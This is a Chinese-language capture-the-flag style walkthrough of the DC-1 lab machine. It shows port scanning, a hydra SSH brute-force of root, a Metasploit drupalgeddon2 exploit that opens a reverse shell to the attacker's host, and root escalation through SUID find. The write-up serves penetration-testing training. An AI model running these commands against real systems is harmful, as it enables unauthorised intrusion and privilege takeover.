本文由掌控安全学院 - 杳若 投稿

总结

getwebshell → 发现CMS → MSF远程反弹SHELL

提 权 思 路 → 发现SUID-FIND → FIND提权

准备工作

• 启动VPN
  获取攻击机IP > 192.168.45.167

• 启动靶机
  获取目标机器IP > 192.168.223.193

信息收集-端口扫描

目标开放端口收集

• Nmap开放端口扫描2次

1. sudo nmap --min-rate 10000 -p- 192.168.223.193

1. sudo nmap -sU --min-rate 10000 -p- 192.168.223.193

通过两次收集到的端口:→22,80,111,46232,53990

目标端口对应服务探测

通常udp端口测不出啥，主要探测tcp

1. # tcp探测
2. sudo nmap -sT -sV -O -sC -p22,80,111,46232,53990 192.168.223.193

信息收集-端口测试

22-SSH端口的信息收集

通过Nmap探测获得SSH的版本信息，可以尝试利用
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)

1. # 进入msf OpenSSH 6.0p1
2. msfconsole
3. # 搜索对应脚本
4. msf6 > searchsploit openssh 6.0p1

尝试root账户的密码爆破发现报错之后进行手动尝试

1. ssh root@192.168.223.193 -p 22
2. # 密码尝试
3. password > root

说明支持密码登录，但是密码不对

尝试root账户的密码爆破，利用工具hydra，线程-t为6

1. hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.223.193 ssh -s 22

在等待结果的同时让我们尝试使用另外的信息收集

80-HTTP端口的信息收集

访问 http://192.168.223.193:80 发现是一个有名的CMS

1. whatweb -v http://192.168.223.193:80

确认了CMS的版本信息 Drupal 7

既然确定了版本，直接上工具

1. msfconsole
3. searchsploit Drupal 7

查看了一下

其他端口的信息收集

不需要啦~

漏洞利用-getwebshell

觉得还是远程执行的exp比较好

1. search Drupal 7
2. >use exploit/unix/webapp/drupal_drupalgeddon2

选一个时间靠后并且Rank比较高的

1. # 感觉只要设置攻击机以及监听端口，还有目标机器
2. show options

1. # 设置个反弹shell
2. show payloads
3. set payload 3

1. # 配置MSF
2. set lhost 192.168.45.208
3. set lport 5555
4. set rhosts 192.168.230.193
5. set rport 80
6. run

成功getwebshell

内网遨游-getshell

交互shell

由于获取的shell交互不友好，使用shell先获取shell

1. # 利用shell命令获取shell
2. meterpreter > shell
3. Process 4192 created.
4. Channel 0 created.
5. pwd
6. /var/www
7. whoami
8. www-data
9. # 利用python获取交互shell -> python失败使用python3
10. python -c "import pty;pty.spawn('/bin/bash')";
11. www-data@DC-1:/var/www$

FLAG1获取

1. www-data@DC-1:/var/www$ find / -name local.txt 2>/dev/null
2. find / -name local.txt 2>/dev/null
3. /home/local.txt
4. www-data@DC-1:/var/www$ cat /home/local.txt
5. cat /home/local.txt
6. ******************

权限提升

查找具有sudo权限，且不需要密码的可提权文件

1. # 利用sudo -l寻找
2. sudo -l

Linux提权-suid提权尝试

1. # -perm 文件权限
2. find / -perm -u=s -type f 2>/dev/null

如果发现有东西的话 访问 https://gtfobins.github.io 寻找

1. # 查找文件提权
2. find . -exec '/bin/sh' ;

提权成功

FLAG2获取

1. # cat /root/proof.txt
2. cat /root/proof.txt
3. ****************

完结撒花~

原文始发于微信公众号（掌控安全EDU）：OSCP系列靶场-Esay-DC-1